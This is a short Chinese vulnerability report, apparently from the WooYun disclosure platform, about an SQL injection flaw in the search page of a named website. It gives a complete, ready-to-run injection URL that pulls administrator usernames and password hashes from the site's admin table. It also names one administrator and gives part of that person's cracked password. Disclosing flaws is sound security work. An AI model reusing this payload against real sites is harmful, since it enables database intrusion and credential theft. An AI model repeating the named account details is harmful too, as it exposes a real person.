WooYun.org

访问如下链接：
http://www.cwan.com//plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
获得了一条管理员用户的用户名和加密密码的信息，如图1。只要稍微修改一下利用代码，就可以获得所有管理员用户和普通用户的用户名和密码。密码虽然是经过加密的，但只要不是很复杂，很容易破解出明文密码，比如获得huxiaojun这个管理员用户的密码为5750xxxx。可能造成所有用户数据泄露，危害不小。